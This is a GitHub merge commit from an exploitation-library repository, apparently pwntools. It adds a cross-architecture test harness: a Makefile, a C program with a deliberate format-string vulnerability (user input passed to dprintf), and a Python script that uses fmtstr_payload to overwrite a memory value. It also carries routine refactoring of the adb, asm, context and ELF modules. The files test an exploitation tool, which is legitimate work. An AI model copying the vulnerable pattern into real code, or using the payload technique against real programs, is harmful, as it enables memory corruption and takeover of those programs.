Skip to content
Permalink
Browse files

Merge branch 'dev' into dev3

  • Loading branch information...
Arusekk committed Sep 24, 2019
2 parents 1566c90 + 2808b5c commit 8fdfd95df66cf1d11b74162f15e9eefdc1d8dc5b
@@ -0,0 +1,51 @@
CFLAGS := -Wno-unused-result -Wno-format-security
TARGETS := printf.mips printf.mips64 printf.mipsel printf.mips64el printf.arm printf.aarch64 \
printf.ppc printf.ppc64 printf.sparc64 printf.native printf.native32

.PHONY: run
run: all
./exploit.py

.PHONY: all
all: $(TARGETS)

.PHONY: clean
clean:
rm -f $(TARGETS)

# mips variants
%.mips: %.c
mips-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^
%.mipsel: %.c
mipsel-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^
%.mips64: %.c
mips64-linux-gnuabi64-gcc $(CFLAGS) -static -Os -o "$@" $^
%.mips64el: %.c
mips64el-linux-gnuabi64-gcc $(CFLAGS) -static -Os -o "$@" $^

# arm variants
%.arm: %.c
arm-linux-gnueabi-gcc $(CFLAGS) -static -Os -o "$@" $^
%.aarch64: %.c
aarch64-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^

# ppc variants
%.ppc: %.c
powerpc-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^
%.ppc64: %.c
powerpc64-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^

# sparc variants
%.sparc64: %.c
sparc64-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^

# native variants
%.native: %.c
gcc $(CFLAGS) -o "$@" $^
%.native32: %.c
i686-linux-gnu-gcc $(CFLAGS) -o "$@" $^

# install deps on ubuntu xenial
.PHONY: install-apt
install-apt:
apt-get install -y make gcc-mips64el-linux-gnuabi64 gcc-sparc64-linux-gnu gcc-powerpc64-linux-gnu gcc-powerpc-linux-gnu gcc-arm-linux-gnueabi gcc-aarch64-linux-gnu gcc-mips64-linux-gnuabi64 gcc-mipsel-linux-gnu gcc-mips64el-linux-gnuabi64 gcc-mips-linux-gnu gcc-i686-linux-gnu gcc
@@ -0,0 +1,39 @@
#!/usr/bin/env python2
from pwn import *

@context.quiet
def exec_fmt(payload):
p = context.binary.process()
p.sendline(payload)
return p.recvall()

def exploit(binary):
context.binary = ELF(binary)
autofmt = FmtStr(exec_fmt)
offset = autofmt.offset
with context.binary.process() as p:
addr = unpack(p.recv(context.bytes))
payload = fmtstr_payload(offset, {addr: p32(0x1337babe)})
p.sendline(payload)
p.recvuntil("DONE")
print hex(u32(p.recv(4)))

binaries = [
"printf.mips",
"printf.mips64",
"printf.mipsel",
"printf.mips64el",
"printf.native",
"printf.native32",
"printf.ppc",
"printf.ppc64",
"printf.sparc64",
"printf.arm",
"printf.aarch64",
]

if len(sys.argv) > 1:
binaries = sys.argv[1:]

for binary in binaries:
exploit(binary)
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,29 @@
#ifdef _FORTIFY_SOURCE
#undef _FORTIFY_SOURCE
#endif
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#define MEMORY_ADDRESS ((void*)0x11110000)
#define MEMORY_SIZE 1024
#define TARGET ((int *) 0x11110100)
int main(int argc, char const *argv[])
{
char buff[1024];
void *ptr = NULL;
int *my_var = TARGET;
ptr = mmap(MEMORY_ADDRESS, MEMORY_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
if(ptr != MEMORY_ADDRESS)
{
perror("mmap");
return EXIT_FAILURE;
}
*my_var = 0x41414141;
write(1, &my_var, sizeof(int *));
scanf("%s", buff);
dprintf(2, buff);
write(1, "DONE", 4);
write(1, my_var, sizeof(int));
return 0;
}
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -52,7 +52,6 @@
import glob
import logging
import os
import platform
import re
import shutil
import six
@@ -416,7 +415,7 @@ def wait_for_device(kick=False):
@with_device
def disable_verity():
"""Disables dm-verity on the device."""
with log.waitfor("Disabling dm-verity on %s" % context.device) as w:
with log.waitfor("Disabling dm-verity on %s" % context.device):
root()

with AdbClient() as c:
@@ -434,7 +433,7 @@ def disable_verity():
@with_device
def remount():
"""Remounts the filesystem as writable."""
with log.waitfor("Remounting filesystem on %s" % context.device) as w:
with log.waitfor("Remounting filesystem on %s" % context.device):
disable_verity()
root()

@@ -856,7 +855,7 @@ def whoami():
def forward(port):
"""Sets up a port to forward to the device."""
tcp_port = 'tcp:%s' % port
start_forwarding = adb(['forward', tcp_port, tcp_port])
adb(['forward', tcp_port, tcp_port])
atexit.register(lambda: adb(['forward', '--remove', tcp_port]))

@context.quietfunc
@@ -1066,7 +1065,7 @@ def enable_uart(self):
'Nexus 7': 'oem uart-on',
}

with log.waitfor('Enabling kernel UART') as w:
with log.waitfor('Enabling kernel UART'):

if model not in known_commands:
log.error("Device UART is unsupported.")
@@ -47,9 +47,7 @@
import platform
import re
import shutil
import string
import subprocess
import sys
import tempfile
from collections import defaultdict
from glob import glob
@@ -161,7 +159,6 @@ def which_binutils(util):
Exception: Could not find 'as' installed for ContextType(arch = 'msp430')
"""
arch = context.arch
bits = context.bits

# Fix up pwntools vs Debian triplet naming, and account
# for 'thumb' being its own pwntools architecture.
@@ -411,8 +408,6 @@ def cpp(shellcode):
>>> cpp("SYS_setresuid", os = "freebsd")
'311\n'
"""
arch = context.arch
os = context.os
code = _include_header() + shellcode
cmd = [
'cpp',
@@ -758,7 +753,6 @@ def disasm(data, vma = 0, byte = True, offset = True, instructions = True):
result = ''

arch = context.arch
os = context.os

tmpdir = tempfile.mkdtemp(prefix = 'pwn-disasm-')
step1 = path.join(tmpdir, 'step1')
@@ -788,7 +782,7 @@ def disasm(data, vma = 0, byte = True, offset = True, instructions = True):
with open(step1, 'wb') as fd:
fd.write(data)

res = _run(objcopy + [step1, step2])
_run(objcopy + [step1, step2])

output0 = _run(objdump + [step2])
output1 = output0.split('<.text>:\n')
@@ -809,16 +803,17 @@ def disasm(data, vma = 0, byte = True, offset = True, instructions = True):
pattern = pattern[::2]
pattern = ''.join(pattern)
for line in result.splitlines():
try:
groups = re.search(pattern, line).groups()
if byte:
o, b, i = groups
else:
o, i = groups
except:
match = re.search(pattern, line)
if not match:
lines.append(line)
continue

groups = match.groups()
if byte:
o, b, i = groups
else:
o, i = groups

line = ''

if offset:
@@ -267,10 +267,6 @@ def _longest(d):
"""
return collections.OrderedDict((k,d[k]) for k in sorted(d, key=len, reverse=True))

def TlsProperty(object):
def __get__(self, obj, objtype=None):
return obj._tls

class ContextType(object):
r"""
Class for specifying information about the target machine.
@@ -429,7 +425,7 @@ def __init__(self, **kwargs):
All keyword arguments are passed to :func:`update`.
"""
self._tls = _Tls_DictStack(_defaultdict(ContextType.defaults))
self._tls = _Tls_DictStack(_defaultdict(self.defaults))
self.update(**kwargs)


@@ -696,11 +692,11 @@ def arch(self, arch):
break

try:
defaults = ContextType.architectures[arch]
defaults = self.architectures[arch]
except KeyError:
raise AttributeError('AttributeError: arch must be one of %r' % sorted(ContextType.architectures))
raise AttributeError('AttributeError: arch must be one of %r' % sorted(self.architectures))

for k,v in ContextType.architectures[arch].items():
for k,v in defaults.items():
if k not in self._tls:
self._tls[k] = v

@@ -730,8 +726,8 @@ def kernel(self, arch):
Even then, this doesn't matter much -- only when the the segment
registers need to be known
"""
with context.local(arch=arch):
return context.arch
with self.local(arch=arch):
return self.arch

@_validator
def bits(self, bits):
@@ -874,10 +870,10 @@ def endian(self, endianness):
"""
endian = endianness.lower()

if endian not in ContextType.endiannesses:
raise AttributeError("endian must be one of %r" % sorted(ContextType.endiannesses))
if endian not in self.endiannesses:
raise AttributeError("endian must be one of %r" % sorted(self.endiannesses))

return ContextType.endiannesses[endian]
return self.endiannesses[endian]


@_validator
@@ -944,7 +940,6 @@ def log_file(self, value):
'...:DEBUG:...:Hello from bar!\n'
"""
if isinstance(value, (bytes, six.text_type)):
modes = ('w', 'wb', 'a', 'ab')
# check if mode was specified as "[value],[mode]"
if ',' not in value:
value += ',a'
@@ -1019,8 +1014,8 @@ def os(self, os):
"""
os = os.lower()

if os not in ContextType.oses:
raise AttributeError("os must be one of %r" % ContextType.oses)
if os not in self.oses:
raise AttributeError("os must be one of %r" % self.oses)

return os

@@ -1058,11 +1053,11 @@ def signed(self, signed):
...
AttributeError: signed must be one of ['no', 'signed', 'unsigned', 'yes'] or a non-string truthy value
"""
try: signed = ContextType.signednesses[signed]
try: signed = self.signednesses[signed]
except KeyError: pass

if isinstance(signed, str):
raise AttributeError('signed must be one of %r or a non-string truthy value' % sorted(ContextType.signednesses))
raise AttributeError('signed must be one of %r or a non-string truthy value' % sorted(self.signednesses))

return bool(signed)

@@ -1167,13 +1162,13 @@ def adb_port(self, value):
def device(self, device):
"""Sets the device being operated on.
"""
if isinstance(device, (bytes, six.text_type)):
device = Device(device)
if isinstance(device, Device):
self.arch = device.arch or self.arch
self.bits = device.bits or self.bits
self.endian = device.endian or self.endian
self.os = device.os or self.os
elif isinstance(device, (bytes, six.text_type)):
device = Device(device)
elif device is not None:
raise AttributeError("device must be either a Device object or a serial number as a string")

@@ -439,9 +439,15 @@ def debug(self, argv=[], *a, **kw):
return pwnlib.gdb.debug([self.path] + argv, *a, **kw)

def _describe(self, *a, **kw):
log.info_once('\n'.join((repr(self.path),
'%-10s%s-%s-%s' % ('Arch:', self.arch, self.bits, self.endian),
self.checksec(*a, **kw))))
log.info_once(
'%s\n%-10s%s-%s-%s\n%s',
repr(self.path),
'Arch:',
self.arch,
self.bits,
self.endian,
self.checksec(*a, **kw)
)

def __repr__(self):
return "ELF(%r)" % self.path

0 comments on commit 8fdfd95

Please sign in to comment.
You can’t perform that action at this time.